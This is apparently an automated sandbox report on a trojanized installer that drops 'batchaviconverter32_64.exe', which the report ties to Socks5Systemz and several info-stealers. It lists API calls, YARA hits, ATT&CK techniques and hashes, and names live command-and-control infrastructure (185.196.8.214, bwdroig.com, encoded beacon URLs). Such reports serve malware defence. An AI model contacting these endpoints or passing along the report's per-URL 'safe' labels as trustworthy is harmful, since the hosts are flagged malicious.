        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 3_2_02DA00FE
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 3_2_02DA00FE
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: 3_2_02D86487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset, 3_2_02D86487
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: 3_2_02D99458 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_02D99458
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 1_2_00478504
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 1_2_0042E09C
        Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe Code function: 3_2_02D97F9D cpuid 3_2_02D97F9D
        Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_0040520C
        Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_00405258
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: GetLocaleInfoA, 1_2_00408568
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: GetLocaleInfoA, 1_2_004085B4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 1_2_004585C8
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-1S2OA.tmp\file.tmp Code function: 1_2_0045559C GetUserNameA, 1_2_0045559C
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405CF4 GetVersionExA, 0_2_00405CF4

        Stealing of Sensitive Information

        Source: Yara match File source: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: batchaviconverter32_64.exe PID: 3220, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match File source: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.3335108759.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: batchaviconverter32_64.exe PID: 3220, type: MEMORYSTR

        ATT&CK matrix (one technique per tactic column; a number in front of a technique is the count the report gives for it)

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 5 Windows Service | 1 DLL Side-Loading | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Bootkit | 1 Access Token Manipulation | 22 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 5 Windows Service | 1 DLL Side-Loading | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 2 Process Injection | 1 Masquerading | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Bootkit | /etc/passwd and /etc/shadow | 3 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Source, Detection, Scanner, Label, Link
• Source: file.exe, Detection: 16%, Scanner: ReversingLabs, Label: Win32.Trojan.Munp
Source, Detection, Scanner, Label, Link
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe, Detection: 100%, Scanner: Joe Sandbox ML
• Source: C:\ProgramData\DKIM Authenticator lib 9.11.45\DKIM Authenticator lib 9.11.45.exe, Detection: 100%, Scanner: Joe Sandbox ML
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy), Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmp, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\is-7PIOL.tmp, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\is-FH5VO.tmp, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\is-NF77P.tmp, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\is-NTR8S.tmp, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\is-O4BPT.tmp, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\libeay32.dll (copy), Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\libssl-1_1.dll (copy), Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\msvcp71.dll (copy), Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\msvcr71.dll (copy), Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Batch AVI Converter\ssleay32.dll (copy), Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_iscrypt.dll, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_isdecmp.dll, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_setup64.tmp, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\is-GJ7K0.tmp\_isetup\_shfoldr.dll, Detection: 0%, Scanner: ReversingLabs
No Antivirus matches
Source, Detection, Scanner, Label, Link
• Source: https://sectigo.com/CPS0, Detection: 0%, Scanner: URL Reputation, Label: safe
• Source: http://ocsp.sectigo.com0, Detection: 0%, Scanner: URL Reputation, Label: safe
• Source: http://www.innosetup.com/, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crl.certum.pl/ctnca.crl0k, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://repository.certum.pl/ctnca.cer09, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://185.196.8.214/, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://ocsp.thawte.com0, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://repository.certum.pl/cscasha2.cer0, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://www.openssl.org/support/faq.html, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crl.certum.pl/cscasha2.crl0q, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://cscasha2.ocsp-certum.com04, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: https://www.certum.pl/CPS0, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://185.196.8.214/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://bwdroig.com/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://www.remobjects.com/psU, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crl.thawte.com/ThawteTimestampingCA.crl0, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: bwdroig.com, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://185.196.8.214/sea, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://www.remobjects.com/ps, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://subca.ocsp-certum.com01, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://www.certum.pl/CPS0, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: https://www.openssl.org/H, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
• Source: http://www.openssl.org/f, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
Name, IP, Active, Malicious, Antivirus Detection, Reputation
• Name: bwdroig.com, IP: 185.196.8.214, Active: true, Malicious: true, Reputation: unknown
Name, Malicious, Antivirus Detection, Reputation
• Name: http://bwdroig.com/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf911c8ee909c39, Malicious: true, Avira URL Cloud: safe, Reputation: unknown
• Name: bwdroig.com, Malicious: true, Avira URL Cloud: safe, Reputation: unknown
Name, Source, Malicious, Antivirus Detection, Reputation
• Name: http://www.innosetup.com/, Source: file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://185.196.8.214/, Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: https://sectigo.com/CPS0, Source: is-7PIOL.tmp.1.dr, Malicious: false, URL Reputation: safe, Reputation: unknown
• Name: http://repository.certum.pl/ctnca.cer09, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://repository.certum.pl/cscasha2.cer0, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0, Source: is-7PIOL.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://ocsp.sectigo.com0, Source: is-7PIOL.tmp.1.dr, Malicious: false, URL Reputation: safe, Reputation: unknown
• Name: http://crl.certum.pl/ctnca.crl0k, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU, Source: file.exe, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://ocsp.thawte.com0, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#, Source: is-7PIOL.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline, Source: file.exe, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#, Source: is-7PIOL.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: https://www.certum.pl/CPS0, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crl.certum.pl/cscasha2.crl0q, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://cscasha2.ocsp-certum.com04, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://www.openssl.org/support/faq.html, Source: is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t, Source: is-7PIOL.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://www.remobjects.com/psU, Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://185.196.8.214/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1, Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, batchaviconverter32_64.exe, 00000003.00000002.3334036790.0000000000738000.00000004.00000020.00020000.00000000.sdmp, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y, Source: is-7PIOL.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crl.thawte.com/ThawteTimestampingCA.crl0, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#, Source: is-7PIOL.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://subca.ocsp-certum.com01, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: https://www.openssl.org/H, Source: is-7PIOL.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://www.remobjects.com/ps, Source: file.exe, 00000000.00000003.2089868592.0000000002350000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2090039031.0000000002118000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-9JGQO.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://www.openssl.org/f, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://185.196.8.214/sea, Source: batchaviconverter32_64.exe, 00000003.00000002.3334036790.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
• Name: http://www.certum.pl/CPS0, Source: is-NF77P.tmp.1.dr, is-NTR8S.tmp.1.dr, Malicious: false, Avira URL Cloud: safe, Reputation: unknown
IP, Domain, Country, ASN, ASN Name, Malicious
• IP: 185.196.8.214, Domain: bwdroig.com, Country: Switzerland, ASN: 34888, ASN Name: SIMPLECARRER2IT, Malicious: true
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1509605
          Start date and time:2024-09-11 21:04:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 4s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@6/27@1/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 92%
          • Number of executed functions: 176
          • Number of non-executed functions: 262
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
          • Report size getting too big, too many NtDeviceIoControlFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe
Time, Type, Description
• Time: 15:05:36, Type: API Interceptor, Description: 541342x Sleep call for process: batchaviconverter32_64.exe modified
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: 185.196.8.214
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: qgdf1HLJno.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: gobEmOm5sr.exe, Detection: malicious, Threat Name: LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig
No context
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: SIMPLECARRER2IT
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz, Context: 185.196.8.214
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: qgdf1HLJno.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz, Context: 185.196.8.214
• Sample: gobEmOm5sr.exe, Detection: malicious, Threat Name: LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig, Context: 185.196.8.214
No context
Match, Associated Sample Name / URL, SHA 256, Detection, Threat Name, Link, Context
Match: C:\Users\user\AppData\Local\Batch AVI Converter\Qt5OpenGL.dll (copy)
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: gn22aYCGh4.exe, Detection: malicious, Threat Name: Unknown
• Sample: setup.exe, Detection: malicious, Threat Name: Unknown
Match: C:\Users\user\AppData\Local\Batch AVI Converter\is-0D2S5.tmp
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: file.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: install.exe, Detection: malicious, Threat Name: Socks5Systemz
• Sample: J6oTAcCqhp.msi, Detection: malicious, Threat Name: DanaBot
• Sample: setup (1).exe, Detection: malicious, Threat Name: Unknown
• Sample: Endermanch@XPAntivirus2008.exe, Detection: malicious, Threat Name: Unknown
• Sample: Endermanch@XPAntivirus2008.exe, Detection: malicious, Threat Name: Unknown
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2644388
                                                            Entropy (8bit):6.6214078319430225
                                                            Encrypted:false
                                                            SSDEEP:24576:vh2bAqsaRXVK6ktBdb4Rm8WceEuB0RHx3hryveaNHewUa7I1sJ4W/hYd4kD2t80k:5IAqsanks023dFn0RnWOINjzdABSaK
                                                            MD5:91646D419442B59CE172BCBAE8A2A8C9
                                                            SHA1:FE2949DBB51067D70E474C5D11A744DC6F165350
                                                            SHA-256:E1C41574C9889CB05922896464BF19298129F0401174DA3FA8F107B2AD0141B5
                                                            SHA-512:D535468FADD5BDE87A8DC3FCADF1A2699E72CE9E6F7C8C1C07EEBA05ADD140AA3AED2ACBD047D8F28B97EDF0423DC61A594D707DD4B8DF1951A0ABC69DBDC395
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......L..........#......P...P.......X.......`....@...........................(.............................................,i..T....................................................................................`...............................text...\J.......P.................. ..`_areg_2.R;...`...@...`..............@..@.data...8 ..........................@....rsrc...............................@..@_breg_2.............................a...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):8
                                                            Entropy (8bit):2.0
                                                            Encrypted:false
                                                            SSDEEP:3:k5tn:kzn
                                                            MD5:DDB4D886C3CB7434AFE7EC02169EC004
                                                            SHA1:4E4958973F443E40E46CE44332CB7C2AB15C481E
                                                            SHA-256:9C88584ADD662B6B6FBA9B1CAA26065FB506F60F95C29B3BECE999219700F77B
                                                            SHA-512:7858F09019D71BBAC5291F7D59C5C086726E5CE10E61441C179B372B8952528485B6ED2AA8EA9ED56EBF61362CB66F8CC7093AC2F5FBD8A98B4684DBAD4F20DB
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...f....
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):0.8112781244591328
                                                            Encrypted:false
                                                            SSDEEP:3:3:3
                                                            MD5:E7C62CD2306A6B991402DB2098965CBC
                                                            SHA1:33B77B9463AB2010488CDCFC5CE920E05602EE50
                                                            SHA-256:2BAAED212BEBC4EBEEB19752C47FF7C4420ADF7806F577722B487A08B605EE13
                                                            SHA-512:B3D72EE590E359259032335B4BBC2C7C400BAD09492D341C8FC9A20908FC4C96277861C561257399BF3A2C4C88E0E15634B8CB0DEAAFD8A8E21ADB72086A6825
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:`...
                                                            Process:C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):128
                                                            Entropy (8bit):2.9545817380615236
                                                            Encrypted:false
                                                            SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                            MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                            SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                            SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
